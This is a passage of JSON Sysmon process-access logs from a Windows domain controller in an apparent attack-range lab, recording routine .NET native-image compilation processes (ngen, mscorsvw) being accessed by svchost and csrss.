{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FEF80C00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FEF80C00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.730\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A7FC0C00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.730","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A7FC0C00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.730\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A7FC0C00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.730","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A7FC0C00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.730\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A7FC0C00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.730","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A7FC0C00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.745\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A6FF0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.745","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A6FF0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.745\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A6FF0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.745","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A6FF0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.761\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A6FF0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.761","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A6FF0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.823\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010C2030D00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 